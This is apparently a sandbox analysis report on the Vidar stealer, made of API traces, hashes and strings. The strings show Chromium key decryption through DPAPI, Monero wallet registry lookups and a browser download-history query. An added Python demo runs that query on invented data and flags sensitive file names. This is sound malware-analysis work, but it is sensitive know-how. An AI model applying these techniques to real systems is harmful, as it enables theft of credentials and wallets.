                                                                                                                                                                                      • Opcode Fuzzy Hash: 06b4b951b7e1372539f0af0baa09f6e0145ce245e05ac2fbc233195266e32838
                                                                                                                                                                                      • Instruction Fuzzy Hash: E281A772804108AADF06FBE4DD96CEE77B8BE25315F510565F402BE0A1EF24BB09CA61
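The Strings entry above (the function whose lstrlenA calls sit at 00347B02 and 00347B16) contains `SELECT target_path, tab_url from downloads`, which is the query Vidar runs against a Chromium-family History database: target_path is where each downloaded file landed on disk, tab_url the page the download was started from. The script below is an added example, not code from the report or the malware. It builds a constructed, reduced stand-in for Chromium's downloads table with invented rows, runs the stealer's exact query against it, and then groups the result by origin host and flags filenames a triage analyst would look at first. The reduced schema, the sample rows and the INTERESTING keyword list are this example's assumptions; the query string is the one from the report.

```python
"""Run the download-history query recorded in this function's strings against a
constructed Chromium-style History database and show what it yields.

Added example, not part of the report or of the malware. SCHEMA is a reduced
stand-in for Chromium's 'downloads' table, SAMPLE_ROWS are invented, and
INTERESTING is this example's own triage heuristic.
"""
import sqlite3
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# Exactly the query string that appears in the report for this function.
STEALER_QUERY = "SELECT target_path, tab_url from downloads"

# Reduced schema (assumption): the real Chromium table has many more columns.
SCHEMA = """
CREATE TABLE downloads (
    id          INTEGER PRIMARY KEY,
    target_path TEXT NOT NULL,   -- where the file ended up on disk
    tab_url     TEXT NOT NULL    -- page the download was started from
);
"""

# Constructed rows standing in for a victim's download history.
SAMPLE_ROWS: List[Tuple[str, str]] = [
    (r"C:\Users\victim\Downloads\quarterly-report.pdf", "https://intranet.example.test/reports"),
    (r"C:\Users\victim\Downloads\wallet-backup.dat", "https://wallet.example.test/export"),
    (r"C:\Users\victim\Downloads\vpn-config.ovpn", "https://vpn.example.test/profile"),
]

# Assumed keyword list: file names worth a second look for either side.
INTERESTING = ("wallet", "seed", "backup", ".kdbx", ".ovpn", ".pem", ".ppk")


def build_history_db(rows: List[Tuple[str, str]] = SAMPLE_ROWS) -> sqlite3.Connection:
    """In-memory database shaped like the part of History the query touches."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO downloads (target_path, tab_url) VALUES (?, ?)", rows)
    conn.commit()
    return conn


def run_stealer_query(conn: sqlite3.Connection) -> List[Tuple[str, str]]:
    """The same read the sample performs: no credentials needed, only access to the file."""
    return conn.execute(STEALER_QUERY).fetchall()


def _basename(windows_path: str) -> str:
    return windows_path.rsplit("\\", 1)[-1]


def exposure_by_host(rows: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Group downloaded file names by the site they came from: the service map an
    attacker gets from download history alone, before any other data is read."""
    out: Dict[str, List[str]] = {}
    for target_path, tab_url in rows:
        host = urlparse(tab_url).hostname or "(unknown)"
        out.setdefault(host, []).append(_basename(target_path))
    return out


def flag_interesting(rows: List[Tuple[str, str]]) -> List[str]:
    """File names matching the INTERESTING keywords, in result order."""
    return [_basename(p) for p, _ in rows if any(k in p.lower() for k in INTERESTING)]


if __name__ == "__main__":
    conn = build_history_db()
    rows = run_stealer_query(conn)
    for target_path, tab_url in rows:
        print(f"{tab_url} -> {target_path}")
    print("by host:", exposure_by_host(rows))
    print("flagged:", flag_interesting(rows))
```

The real History file is held open by the browser while it runs, which is why stealers copy it elsewhere before opening it; the query itself is an ordinary read and leaves nothing in the database to detect, so the file copy and the process reading it are the observable events.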
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 003469A2: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
                                                                                                                                                                                        • Part of subcall function 003469A2: GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
                                                                                                                                                                                        • Part of subcall function 003469A2: LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
                                                                                                                                                                                        • Part of subcall function 003469A2: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
                                                                                                                                                                                        • Part of subcall function 003469A2: CloseHandle.KERNEL32(?), ref: 00346A2E
                                                                                                                                                                                        • Part of subcall function 0034F884: LocalAlloc.KERNEL32(00000040,0035158E,ERROR,00361C14,?,0035158D,00000000,00000000), ref: 0034F89D
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00361538,0035E266), ref: 0034A9B0
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034A9CC
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
• String ID: ^userContextId=4294967295$f5$moz-extension+++
• API String ID: 161838763-3497579655
• Opcode ID: 548af0d37eeae6d458c0462c35f59200353097fc858fe863fa3170162381ec3f
• Instruction ID: 95cc8734dfb5040c1807788d7f03b2db3b1c82b1a6fb30922ac413686bf75f20
• Opcode Fuzzy Hash: 548af0d37eeae6d458c0462c35f59200353097fc858fe863fa3170162381ec3f
• Instruction Fuzzy Hash: 6A510B72900108AADF16FBA4DD52CEE77B8BF55304F850565F802AE191FF24FB09C6A2
APIs
• SetFilePointer.KERNEL32(?,00000000,00000000,00000001,0035E266,00000000,00361ECC,?,0035905A,?,?,00355A8E,00000000,?,003590A0,?), ref: 0035821E
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,0035E266,00000000,00361ECC,?,0035905A,?,?,00355A8E,00000000), ref: 00358258
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: File$CreatePointer
• String ID:
• API String ID: 2024441833-0
• Opcode ID: e08bc6f64c814ad668a0d1d82f8ea71d16a59fcca2ccdb726ac9ca8b3c1cb05f
• Instruction ID: d3b52857a8d39ddf8301bd09f14c2be0538466e8e9f6a039342cfdf815944785
• Opcode Fuzzy Hash: e08bc6f64c814ad668a0d1d82f8ea71d16a59fcca2ccdb726ac9ca8b3c1cb05f
• Instruction Fuzzy Hash: 0731B3B0500B44DFDB329F25C884E277FA8FB15356F108E2EF996A29A0D7709C88CB55
APIs
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
  • Part of subcall function 003469A2: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
  • Part of subcall function 003469A2: GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
  • Part of subcall function 003469A2: LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
  • Part of subcall function 003469A2: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
  • Part of subcall function 003469A2: CloseHandle.KERNEL32(?), ref: 00346A2E
  • Part of subcall function 0034F884: LocalAlloc.KERNEL32(00000040,0035158E,ERROR,00361C14,?,0035158D,00000000,00000000), ref: 0034F89D
• StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0034B556
  • Part of subcall function 00346A41: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,=a4,00000000,00000000), ref: 00346A61
  • Part of subcall function 00346A41: LocalAlloc.KERNEL32(00000040,=a4,?,?,0034613D,00000000,?,?,?,?,?,?,?,?,00361ECC), ref: 00346A6F
  • Part of subcall function 00346A41: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,=a4,00000000,00000000), ref: 00346A85
  • Part of subcall function 00346A41: LocalFree.KERNEL32(00000000,?,?,0034613D,00000000,?,?,?,?,?,?,?,?,00361ECC), ref: 00346A94
• memcmp.MSVCRT(?,DPAPI,00000005), ref: 0034B594
  • Part of subcall function 00346AA4: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00346AC7
  • Part of subcall function 00346AA4: LocalAlloc.KERNEL32(00000040,?,?), ref: 00346ADF
  • Part of subcall function 00346AA4: LocalFree.KERNEL32(?), ref: 00346AFD
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                      • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                                      • API String ID: 512175977-738592651
                                                                                                                                                                                      • Opcode ID: 69d528b0ad8e17b66b55fe3a28413f1979dbe261290f0e0c23875e05e42b15c7
                                                                                                                                                                                      • Instruction ID: fe68d3d0768d9cee9e4879fe2031fb1052508e055eda694364418765ea3f2261
                                                                                                                                                                                      • Opcode Fuzzy Hash: 69d528b0ad8e17b66b55fe3a28413f1979dbe261290f0e0c23875e05e42b15c7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C2150B6D001087BDF16ABA5DC069EEB7BC9F41350F0581A1F901E9182FB31EB14C661
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412B4
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412BB
                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,?,00000000,00020119,?,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412D4
                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8), ref: 003412ED
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412F6
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3466090806-0
                                                                                                                                                                                      • Opcode ID: 95d99a945a9c568da400a4f58ba531460609eb6a1d95f4324b9b089a8b84f265
                                                                                                                                                                                      • Instruction ID: 4bfb9bd2c0d86fbf16f6f9d5b5b260b7991dff723d7bda66e3fa98139f45be59
                                                                                                                                                                                      • Opcode Fuzzy Hash: 95d99a945a9c568da400a4f58ba531460609eb6a1d95f4324b9b089a8b84f265
                                                                                                                                                                                      • Instruction Fuzzy Hash: B1F03AB9640208BFEB119FD1DC0AFAE7B79FB84745F108024F606E91A0D7B19A919B60
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00361678,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00361678), ref: 0034E9FD
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00361678,00000000,?), ref: 0034EA04
                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0034EA22
                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0034EA3E
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00352F7B,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00361678,00000000,?), ref: 0034EA47
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3466090806-0
                                                                                                                                                                                      • Opcode ID: 380f67f229a4408b397c042020c93a18c9bf2947edf23cc2067672a93b0ea547
                                                                                                                                                                                      • Instruction ID: 7b72410c4c2580dd17f79106afaf086923160baee84a7b0a5efc7e3fccfb0097
                                                                                                                                                                                      • Opcode Fuzzy Hash: 380f67f229a4408b397c042020c93a18c9bf2947edf23cc2067672a93b0ea547
                                                                                                                                                                                      • Instruction Fuzzy Hash: 68F03AB6240208BFEB11DBD1DC0AFAE7A7DFB84745F104024F706A51A0D6B19A919B20
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?), ref: 00346CCC
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrlenA.KERNEL32(?,0000000C,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E5FA
                                                                                                                                                                                        • Part of subcall function 0034E5F1: lstrcpyA.KERNEL32(00000000,00000000,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E62E
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,003613F8,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0035E266), ref: 00346D30
                                                                                                                                                                                      • LoadLibraryA.KERNEL32 ref: 00346D44
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00346CC0, 00346CC5, 00346CDF
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                      • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                      • API String ID: 2929475105-2812842227
                                                                                                                                                                                      • Opcode ID: cb23ae53be02da73f94be8a8d7ac00d40ce8c00c1a900d8b59de7026f1990dca
                                                                                                                                                                                      • Instruction ID: fc950920b3043d35903b0f8161fd38dac21bd2fbec484f45ca5026bf2ddb821a
                                                                                                                                                                                      • Opcode Fuzzy Hash: cb23ae53be02da73f94be8a8d7ac00d40ce8c00c1a900d8b59de7026f1990dca
                                                                                                                                                                                      • Instruction Fuzzy Hash: 76315D71815120EBCB12EFE0ED028AE7BB4FB157187168176F402A9071EBB16A52CBA1
APIs
• _EH_prolog.MSVCRT ref: 00351664
• lstrlenA.KERNEL32(00000000), ref: 00351681
• StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0035171D
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: H_prologlstrlen
• String ID: ERROR
• API String ID: 2133942097-2861137601
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0034104D,HAL9TH,003555D9), ref: 0034E822
• HeapAlloc.KERNEL32(00000000,?,?,?,0034104D,HAL9TH,003555D9), ref: 0034E829
• GetComputerNameA.KERNEL32(00000000,?), ref: 0034E83D
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Heap$AllocComputerNameProcess
• String ID: f5
• API String ID: 4203777966-2543225189
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: strcmp$free
• String ID: @$rnal
• API String ID: 3401341699-826727331
APIs
• Sleep.KERNEL32(000003E8,?,?,?,?,00361678,003613FC,00361ECC), ref: 0035276D
• _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
• CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
• WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: CreateObjectOpenSingleSleepThreadWait
• String ID:
• API String ID: 1990444757-0
APIs
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• StrCmpCA.SHLWAPI(00000000,Opera GX,0035E266,0035E266,?,?), ref: 0034C619
  • Part of subcall function 0034F83B: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
  • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
  • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
  • Part of subcall function 0034F80B: GetFileAttributesA.KERNEL32(00000000,?,?,0034AF28,?), ref: 0034F818
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
• String ID: Opera GX$f5
• API String ID: 1719890681-685903615
• Opcode ID: 3522518964456d27d83d55209196aeb3e3ced08c8814256e633ff02e8db4af87
• Instruction ID: 0c6af45f73f33d8d5a4eccb3cb57c6e360559ed0aaa8fd5cfce9d2fe7d46680a
• Opcode Fuzzy Hash: 3522518964456d27d83d55209196aeb3e3ced08c8814256e633ff02e8db4af87
• Instruction Fuzzy Hash: 07B1C672900108AADF16FBA4D992DEE77BCBF15304F510526F502BE091FE35BB09CAA5
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
• Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
Similarity
• API ID: CreateFile
• String ID: exclusive$winOpen
• API String ID: 823142352-1568912604
• Opcode ID: ff90b5ff9f65aa81a6cf32d7345712a6d06921c8ce447e6fe5c06270544096a6
• Instruction ID: ddd978882cd5270fa8f94071a9300b4b805ea89cb158bd2aa8a7dfbc70792811
• Opcode Fuzzy Hash: ff90b5ff9f65aa81a6cf32d7345712a6d06921c8ce447e6fe5c06270544096a6
• Instruction Fuzzy Hash: B4D1A2709047499FDB10DFA9D58478EBBF0AF88318F208929E868EB394E774D985CF41
APIs
